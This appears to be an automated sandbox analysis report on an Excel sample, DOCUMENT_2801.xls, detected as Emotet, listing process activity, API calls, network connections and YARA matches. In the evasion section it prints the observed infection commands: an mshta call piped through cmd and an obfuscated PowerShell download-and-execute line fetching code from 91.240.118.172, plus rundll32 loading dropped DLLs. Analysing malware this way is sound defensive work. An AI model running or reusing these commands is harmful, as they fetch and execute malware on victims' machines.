                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exe TID: 2552Thread sleep time: -360000s >= -30000s
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 3.2 %
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 3.2 %
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end node
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end node
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                            Source: rundll32.exe, 0000000C.00000002.509950436.00000000002AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                            Source: rundll32.exe, 0000000E.00000002.559655343.000000000032A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10030334 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0035BAEA FindFirstFileW,
                            Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002CD374 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0082C774 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0074D374 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0061D374 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002AD374 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0028D374 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0035D374 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10002280 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            System process connects to network (likely due to code injection or exploit)
                            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 74.207.230.120 144
                            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 139.196.72.155 144
                            Passes commands via pipe to a shell (likely to bypass AV or HIPS)
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c set ooo=mshta http://91.240.118.172/ee/ss/se.html & echo %ooo% | cmd
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c set ooo=mshta http://91.240.118.172/ee/ss/se.html & echo %ooo% | cmd
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo %ooo% "
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/ee/ss/se.html
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKat
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKat
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\Milossd.dll",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx",RIBFxhGufP
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf",RPzUMBQVQiRJfbr
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf",DllRegisterServer
                            Source: Yara matchFile source: DOCUMENT_2801.xls, type: SAMPLE
                            Source: Yara matchFile source: C:\Users\user\Desktop\DOCUMENT_2801.xls, type: DROPPED
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003DAA7 cpuid
                            Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003906D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003CE1A __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_100453C8 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterClipboardFormatA,

                            Stealing of Sensitive Information

                            barindex
                            Yara detected Emotet
                            Source: Yara matchFile source: 17.2.rundll32.exe.27d0000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.25b0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.3090000.27.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2f70000.23.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.3c0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2880000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.880000.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2db0000.19.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2760000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.860000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2a90000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.370000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.2e10000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.3c0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2730000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2db0000.19.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.e80000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.7d0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.d80000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.e50000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2eb0000.21.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.2900000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2db0000.13.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.29a0000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2f70000.23.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.340000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2800000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2b30000.14.raw.unpack, type: UNPACKEDPE
